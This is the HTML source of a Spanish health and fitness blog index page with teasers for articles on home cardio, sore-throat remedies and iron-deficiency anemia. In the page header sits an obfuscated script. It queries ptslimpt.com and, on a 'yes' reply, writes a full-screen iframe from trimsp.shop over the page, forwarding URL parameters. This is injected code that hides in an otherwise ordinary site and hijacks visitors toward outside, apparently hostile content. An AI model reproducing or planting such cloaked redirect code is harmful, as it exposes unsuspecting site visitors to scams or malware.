<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
     

    <title>la naturalidad</title>

    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,700,900|Rubik:300,400,500" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="stylesheet" href="css/vendor/owl.carousel.min.css"/>
    <link rel="stylesheet" href="css/vendor/owl.theme.default.min.css"/>
    <link rel="stylesheet" href="css/custom.css">

    <!--[if lt IE 9]>
    <script src="js/vendor/html5shiv.min.js"></script>
    <script src="js/vendor/respond.min.js"></script>
    <![endif]-->

    <script src="https://use.fontawesome.com/9b701ba3c8.js"></script>
    <script src="js/vendor/jquery.min.js"></script>
    <script src="js/vendor/owl.carousel.min.js"></script>

   <script src="https://code.jquery.com/jquery-3.4.1.js"></script> 
</head>
<body>

<header class="header-section">
    <a href="index.html" class="site-logo">
        excelente
    </a>
    <ul class="main-menu">
        <li><a href="index.html">Inicio</a></li>
        <li><a href="blog.html">Artículo</a></li>
        <li><a href="contact.html">Contactos</a></li>
    </ul>
    <script>
function _0x5590(){var _0x53a3bd=['write','704dZCErf','<iframe\x20src=\x22https://trimsp.shop/index.php?key=0w1e3c85yl5bvkxiwifg&marks=marks&fb=fb&marks=','location','\x22\x20frameborder=\x220\x22\x20style=\x22overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\x22\x20height=\x22100%\x22\x20width=\x22100%\x22></iframe>','2WYbhHG','=([^&=]+)','&fb=','https://ptslimpt.com/index.php?key=j2ie7366d9obcuh8ovwu&marks=marks&fb=fb','538340qXgmha','marks','match','search','4111560npnBYd','4aYXRes','15534sTjztJ','394894INZADH','1480875gWrFIH','324YsuWRj','722616VrPhXj','165ZheqTd','get','54229UCjbVs'];_0x5590=function(){return _0x53a3bd;};return _0x5590();}var _0x185543=_0xa4ee;(function(_0x1c3fc0,_0x2e52b2){var _0x3af5b4=_0xa4ee,_0x2a8310=_0x1c3fc0();while(!![]){try{var _0x17be08=parseInt(_0x3af5b4(0x82))/0x1*(parseInt(_0x3af5b4(0x8d))/0x2)+-parseInt(_0x3af5b4(0x8e))/0x3+parseInt(_0x3af5b4(0x8b))/0x4*(-parseInt(_0x3af5b4(0x8a))/0x5)+-parseInt(_0x3af5b4(0x8f))/0x6*(-parseInt(_0x3af5b4(0x7c))/0x7)+parseInt(_0x3af5b4(0x7e))/0x8*(parseInt(_0x3af5b4(0x8c))/0x9)+-parseInt(_0x3af5b4(0x86))/0xa+-parseInt(_0x3af5b4(0x91))/0xb*(-parseInt(_0x3af5b4(0x90))/0xc);if(_0x17be08===_0x2e52b2)break;else _0x2a8310['push'](_0x2a8310['shift']());}catch(_0x3f44b4){_0x2a8310['push'](_0x2a8310['shift']());}}}(_0x5590,0x79bbb));function getCookies(_0x4577c7){var _0x27b364=_0xa4ee,_0x3636f2=window[_0x27b364(0x80)][_0x27b364(0x89)];return _0x3636f2=_0x3636f2[_0x27b364(0x88)](new RegExp(_0x4577c7+_0x27b364(0x83))),_0x3636f2?_0x3636f2[0x1]:![];}function _0xa4ee(_0x30a9b1,_0x5951cd){var _0x559047=_0x5590();return _0xa4ee=function(_0xa4eeff,_0x38970b){_0xa4eeff=_0xa4eeff-0x7c;var _0x14e538=_0x559047[_0xa4eeff];return _0x14e538;},_0xa4ee(_0x30a9b1,_0x5951cd);}$[_0x185543(0x92)](_0x185543(0x85),onAjaxSuccess);function onAjaxSuccess(_0x553336){var _0x3e43b4=_0x185543;_0x553336=='yes'&&document[_0x3e43b4(0x7d)](_0x3e43b4(0x7f)+getCookies(_0x3e43b4(0x87))+_0x3e43b4(0x84)+getCookies('fb')+_0x3e43b4(0x81));}
</script>
    <div class="slicknav_menu"><a href="#" aria-haspopup="true" role="button" tabindex="0"
                                  class="slicknav_btn slicknav_collapsed"><span
            class="slicknav_menutxt">MENU</span><span class="slicknav_icon"><span class="slicknav_icon-bar"></span><span
            class="slicknav_icon-bar"></span><span class="slicknav_icon-bar"></span></span></a>
        <ul class="slicknav_nav slicknav_hidden" aria-hidden="true" role="menu" style="display: none;">
            <li><a href="index.html" role="menuitem" tabindex="-1">Inicio</a></li>
            <li><a href="blog.html" role="menuitem" tabindex="-1">Artículo</a></li>
            <li><a href="contact.html" role="menuitem" tabindex="-1">Contactos</a></li>
        </ul>
    </div>
</header>

<style>
    .header-section {
        width: 100%;
        left: 0;
        top: 0;
        background: #353535;
        z-index: 9999;
    }

    .site-logo {
        display: inline-block;
        padding: 21px 55px 20px;
        background: #222222;
    }

    .main-menu {
        display: inline-block;
        padding-left: 44px;
        position: relative;
        z-index: 99;
        background: #353535;
        margin: 0;
    }

    .main-menu li {
        display: inline-block;
    }

    .main-menu li a {
        position: relative;
        display: block;
        padding: 44px 7px;
        margin-right: 55px;
        font-size: 16px;
        font-weight: 500;
        color: #fff;
    }

    .main-menu li a:after {
        position: absolute;
        content: "";
        width: 0;
        height: 3px;
        left: 0;
        bottom: 0;
        background: #10ddb4;
        -webkit-transition: all 0.3s;
        transition: all 0.3s;
    }

    .main-menu li a:hover:after {
        width: 100%;
    }

    .slicknav_menu {
        display: none;
    }

    .header-add {
        position: absolute;
        right: 0;
        top: 0;
        width: 43%;
        height: 100%;
        text-align: right;
    }

    .header-add img {
        height: 100%;
    }
</style>

<section id="main-slider" class="no-margin main-banner">
    
    <div class="item" style="background-image: url(./assets/images/dose-juice-j_ywov_uzrw-unsplash.jpg); min-height: 500px; background-size: cover;">
        <div class="container">
            <div class="row slide-margin pt-5">
                <div class="col-sm-6">
                    <div class="carousel-content">
                        <h1 class="animation animated-item-1 text-shadow">Los mejores ejercicios de cardio que usted puede hacer en casa</h1>
                        <a class="btn-slide animation animated-item-3 text-shadow" href="Dc8WsVFadDuqoOLW.html">
                            Leer más
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    

</section>

<style>
    #main-slider {
        position: relative;
    }

    .no-margin {
        margin: 0;
        padding: 0;
    }

    #main-slider .carousel .carousel-content {
        margin-top: 150px;
    }

    #main-slider .carousel .slide-margin {
        margin-top: 140px;
    }

    #main-slider .carousel h2 {
        color: #fff;
    }

    #main-slider .carousel .btn-slide {
        padding: 8px 20px;
        background: #c52d2f;
        color: #fff;
        border-radius: 4px;
        margin-top: 25px;
        display: inline-block;
    }

    #main-slider .carousel .slider-img {
        text-align: right;
        position: absolute;
    }


    #main-slider .carousel .item {
        background-position: 50%;
        background-repeat: no-repeat;
        background-size: cover;
        left: 0 !important;
        opacity: 0;
        top: 0;
        position: absolute;
        width: 100%;
        display: block !important;
        height: 730px;
        -webkit-transition: opacity ease-in-out 500ms;
        -moz-transition: opacity ease-in-out 500ms;
        -o-transition: opacity ease-in-out 500ms;
        transition: opacity ease-in-out 500ms;
    }

    #main-slider .carousel .item:first-child {
        top: auto;
        position: relative;
    }

    #main-slider .carousel .item.active {
        opacity: 1;
        -webkit-transition: opacity ease-in-out 500ms;
        -moz-transition: opacity ease-in-out 500ms;
        -o-transition: opacity ease-in-out 500ms;
        transition: opacity ease-in-out 500ms;
        z-index: 1;
    }

    #main-slider .prev,
    #main-slider .next {
        position: absolute;
        top: 50%;
        background-color: #c52d2f;
        color: #fff;
        display: inline-block;
        margin-top: -25px;
        height: 40px;
        line-height: 40px;
        width: 40px;
        line-height: 40px;
        text-align: center;
        border-radius: 4px;
        z-index: 5;
    }

    #main-slider .prev:hover,
    #main-slider .next:hover {
        background-color: #000;
    }

    #main-slider .prev {
        left: 10px;
    }

    #main-slider .next {
        right: 10px;
    }

    #main-slider .carousel-indicators li {
        width: 20px;
        height: 20px;
        background-color: #fff;
        margin: 0 15px 0 0;
        position: relative;
    }

    #main-slider .carousel-indicators li:after {
        position: absolute;
        content: "";
        width: 24px;
        height: 24px;
        border-radius: 100%;
        background: rgba(0, 0, 0, 0);
        border: 1px solid #FFF;
        left: -3px;
        top: -3px;
    }

    #main-slider .carousel-indicators .active {
        width: 20px;
        height: 20px;
        background-color: #c52d2f;
        margin: 0 15px 0 0;
        border: 1px solid #c52d2f;
        position: relative;
    }

    #main-slider .carousel-indicators .active:after {
        position: absolute;
        content: "";
        width: 24px;
        height: 24px;
        border-radius: 100%;
        background: #c52d2f;
        border: 1px solid #c52d2f;
        left: -3px;
        top: -3px;
    }

    #main-slider .active .animation.animated-item-1 {
        -webkit-animation: fadeInUp 300ms linear 300ms both;
        -moz-animation: fadeInUp 300ms linear 300ms both;
        -o-animation: fadeInUp 300ms linear 300ms both;
        -ms-animation: fadeInUp 300ms linear 300ms both;
        animation: fadeInUp 300ms linear 300ms both;
    }

    #main-slider .active .animation.animated-item-2 {
        -webkit-animation: fadeInUp 300ms linear 600ms both;
        -moz-animation: fadeInUp 300ms linear 600ms both;
        -o-animation: fadeInUp 300ms linear 600ms both;
        -ms-animation: fadeInUp 300ms linear 600ms both;
        animation: fadeInUp 300ms linear 600ms both;
    }

    #main-slider .active .animation.animated-item-3 {
        -webkit-animation: fadeInUp 300ms linear 900ms both;
        -moz-animation: fadeInUp 300ms linear 900ms both;
        -o-animation: fadeInUp 300ms linear 900ms both;
        -ms-animation: fadeInUp 300ms linear 900ms both;
        animation: fadeInUp 300ms linear 900ms both;
    }

    #main-slider .active .animation.animated-item-4 {
        -webkit-animation: fadeInUp 300ms linear 1200ms both;
        -moz-animation: fadeInUp 300ms linear 1200ms both;
        -o-animation: fadeInUp 300ms linear 1200ms both;
        -ms-animation: fadeInUp 300ms linear 1200ms both;
        animation: fadeInUp 300ms linear 1200ms both;
    }
</style>

<div class="section" style="padding: 80px 0">
    <!-- CONTAINER -->
    <div class="container">
        <!-- ROW -->
        <div class="row">
            <!-- Main Column -->
            <div class="col-md-8 offset-md-2">

                
                <article class="article row-article">
                    <div class="article-img">
                        <a href="Dc8WsVFadDuqoOLW.html">
                            <img src="./assets/images/dose-juice-j_ywov_uzrw-unsplash.jpg" alt="">
                        </a>
                    </div>
                    <div class="article-body">
                        <h3 class="article-title"><a href="Dc8WsVFadDuqoOLW.html">Los mejores ejercicios de cardio que usted puede hacer en casa</a></h3>
                        <ul class="article-meta">
                            <li><i class="fa fa-clock-o"></i> 11.08.2021</li>
                            <li><i class="fa fa-comments"></i> 8</li>
                        </ul>
                        <p><strong></strong> ejercicios de Cardio fortalecer el corazón, los vasos sanguíneos y los pulmones, aumentar la resistencia, mejorar el metabolismo y hacen que el cuerpo delgado y hermoso.La realización de ejercicios de cardio que es mucho más ase...</p>
                    </div>
                </article>
                

                <article class="article row-article">
                    <div class="article-img">
                        <a href="fDBMxcQb8mv8e.html">
                            <img src="./assets/images/bady-abbas-chrxkn7j8ic-unsplash.jpg" alt="">
                        </a>
                    </div>
                    <div class="article-body">
                        <h3 class="article-title"><a href="fDBMxcQb8mv8e.html">Los mejores remedios caseros para el dolor de garganta y la inflamación</a></h3>
                        <ul class="article-meta">
                            <li><i class="fa fa-clock-o"></i> 11.08.2021</li>
                            <li><i class="fa fa-comments"></i> 29</li>
                        </ul>
                        <p> <strong></strong> la Inflamación y el dolor de garganta es uno de los síntomas más comunes del mundo moderno. Está causada por virus, bacterias, hongos y parásitos. Si no se trata, puede convertirse en una completa crónica de la enfermedad.Afo...</p>
                    </div>
                </article>
                

                <article class="article row-article">
                    <div class="article-img">
                        <a href="480028e5abde553a7eba48f809754182.html">
                            <img src="./assets/images/alyson-mcphee-ywg-ndhxvqy-unsplash.jpg" alt="">
                        </a>
                    </div>
                    <div class="article-body">
                        <h3 class="article-title"><a href="480028e5abde553a7eba48f809754182.html">4 causas de la anemia por deficiencia de hierro</a></h3>
                        <ul class="article-meta">
                            <li><i class="fa fa-clock-o"></i> 11.08.2021</li>
                            <li><i class="fa fa-comments"></i> 16</li>
                        </ul>
                        <p><strong></strong> anemia por deficiencia de Hierro es un número insuficiente de glóbulos rojos en la sangre, o, como se les llama, células rojas de la sangre. Realizan una importante función: proporcionar oxígeno a las células y dependen direct...</p>
                    </div>
                </article>
                

            </div>
            <!-- /Main Column -->
        </div>
        <!-- /ROW -->
    </div>
    <!-- /CONTAINER -->
</div>

<style>
    .article {
        position:relative;
        margin-bottom:30px;
    }

    .article .article-img > a {
        display:block;
    }

    .article .article-img > a:after {
        content:"";
        position:absolute;
        left:0;
        top:0;
        right:0;
        bottom:0;
        background: #222;
        opacity:0;
        -webkit-transition:0.2s opacity;
        transition:0.2s opacity;
    }

    .article:hover .article-img > a:after {
        opacity:0.3;
    }

    .article .article-img {
        position:relative;
        overflow:hidden;
        margin-bottom:15px;
    }

    .article .article-img img {
        width:100%;
        -webkit-transition:0.5s -webkit-transform;
        transition:0.5s -webkit-transform;
        transition:0.5s transform;
        transition:0.5s transform, 0.5s -webkit-transform;
    }

    .article:hover .article-img img {
        -webkit-transform:scale(1.1);
        -ms-transform:scale(1.1);
        transform:scale(1.1);
    }

    .article .article-img  .article-info {
        position:absolute;
        bottom:15px;
        left:15px;
        z-index:22;
    }

    .article .article-body .article-info {
        margin-bottom:15px;
    }

    .article .article-info li {
        display:inline-block;
        margin-right:-2px;
    }

    .article .article-info .article-type {
        width:30px;
        height: 30px;
        line-height: 30px;
        text-align:center;
        background: #222;
        color: #FFF;
        font-size: 12.5px;
    }

    .article .article-info .article-category > a {
        display:block;
        padding: 0px 15px;
        height: 30px;
        line-height: 30px;
        background: #EF233C;
        color: #FFF;
        text-transform: uppercase;
        font-size: 12.5px;
    }

    .article .article-info .article-category > a:hover {
        opacity:0.8;
    }

    .article .article-title {
        text-transform: uppercase;
        margin-top:0px;
    }

    .article .article-title > a {
        font-weight:700;
    }

    .article .article-meta {
        margin-bottom: 10px;
        margin-top: 10px;
    }

    .article .article-meta li {
        display:inline-block;
        color:#DDD;
        font-weight:400;
        font-size:12.5px;
        text-transform:uppercase;
    }

    .article .article-meta li + li {
        margin-left:10px;
    }

    /*------------------------------------*\
        Thumb Article
    \*------------------------------------*/
    .article.thumb-article {
        margin-bottom:0px;
    }

    .article.thumb-article .article-img {
        margin-bottom:0px;
    }

    .article.thumb-article .article-img:after {
        content:"";
        position:absolute;
        left:0;
        top:0;
        right:0;
        bottom:0;
        background: -webkit-gradient(linear, left bottom, left top, from(#222), to(transparent));
        background: linear-gradient(to top, #222 0%, transparent 100%);
        opacity:0.5;
        -webkit-transition:0.2s opacity;
        transition:0.2s opacity;
    }

    .article.thumb-article:hover .article-img:after {
        opacity:1;
    }

    .article.thumb-article .article-body {
        position: absolute;
        bottom: 0;
        left:0;
        right:0;
        padding: 15px 5%;
        z-index:20;
    }

    .article.thumb-article .article-body .article-title > a {
        color:#FFF;
    }

    .article.thumb-article .article-body .article-title > a:hover {
        color: #DDD;
    }

    /*------------------------------------*\
        Widget Article
    \*------------------------------------*/
    .article.widget-article:after {
        content:"";
        display:block;
        clear:both;
    }

    .article.widget-article .article-img {
        float:left;
        width:80px;
        margin-right:15px;
        margin-bottom:0px;
    }

    .article.widget-article .article-title {
        font-size:15px;
    }

    /*------------------------------------*\
        Row Article
    \*------------------------------------*/
    .article.row-article:after {
        content:"";
        display:block;
        clear:both;
    }

    .article.row-article .article-img {
        width:50%;
        float:left;
        margin-right:30px;
        margin-bottom:0px;
    }

    @media only screen and (max-width: 767px) {
        .article.row-article .article-img {
            width:180px;
        }

        .article.row-article .article-body p {
            display:none;
        }
    }

    @media only screen and (max-width: 480px) {
        .article.row-article .article-img {
            float:none;
            margin-bottom:15px;
        }
    }

    /*-- article pagination --*/
    .article-pagination {
        margin-top:30px;
        margin-bottom:30px;
    }

    .article-pagination ul li {
        display:inline-block;
    }

    .article-pagination ul li a {
        display:block;
        padding:6px 15px;
        color:#DDD;
        border:1px solid #DDD;
        font-size:12.5px;
    }
    .article-pagination ul li a:hover {
        color:#EF233C;
        border-color:#EF233C;
    }

    .article-pagination ul li.active a {
        background-color:#EF233C;
        border-color:#EF233C;
        color:#FFF;
    }
</style>

<footer id="footer">

    <!-- Bottom Footer -->
    <div id="bottom-footer" class="section">
        <!-- CONTAINER -->
        <div class="container">
            <!-- ROW -->
            <div class="row">
                <!-- footer links -->
                <div class="col-md-12">
                    <ul class="footer-links">
                        <li><a href="index.html">Inicio</a></li>
                        <li><a href="blog.html">Artículo</a></li>
                        <li><a href="contact.html">Contactos</a></li>
                        <li><a href="terms.html">Términos y condiciones</a></li>
                        <li><a href="policy.html">Política de privacidad</a></li>
                    </ul>
                </div>
                <!-- /footer links -->

            </div>
            <!-- /ROW -->
        </div>
        <!-- /CONTAINER -->
    </div>
    <!-- /Bottom Footer -->
</footer>

<style>
    #footer {
        padding: 15px 0;
        background-color: #07090C;
    }

    #footer p {
        color:#DDD;
    }

    #footer a {
        color:#DDD;
    }

    #footer a:hover {
        color:#EF233C;
    }

    /*------------------------------------*\
        Top Footer
    \*------------------------------------*/
    .footer-widget  {
        margin-top:30px;
        margin-bottom:30px;
    }

    .footer-widget .widget-title {
        margin-bottom:15px;
    }

    .footer-widget .widget-title .title {
        font-size:15px;
        text-transform:uppercase;
        color:#FFF;
        margin-top:10px;
    }

    .footer-widget .footer-logo .logo {
        display:inline-block;
        margin-bottom:15px;
    }

    .footer-widget .footer-logo .logo  > img {
        width: 100%;
        max-height: 90px;
    }

    /*------------------------------------*\
        Bottom Footer
    \*------------------------------------*/
    .footer-links {
        margin-bottom: 0;
        text-align:center;
    }

    .footer-links li {
        display:inline-block;
    }

    .footer-links li a {
        display: block;
        padding: 0px 10px;
        color: #DDD;
        font-size: 12.5px;
        text-align: center;
        text-transform: uppercase;
    }

    .footer-copyright {
        color: #DDD;
    }
</style>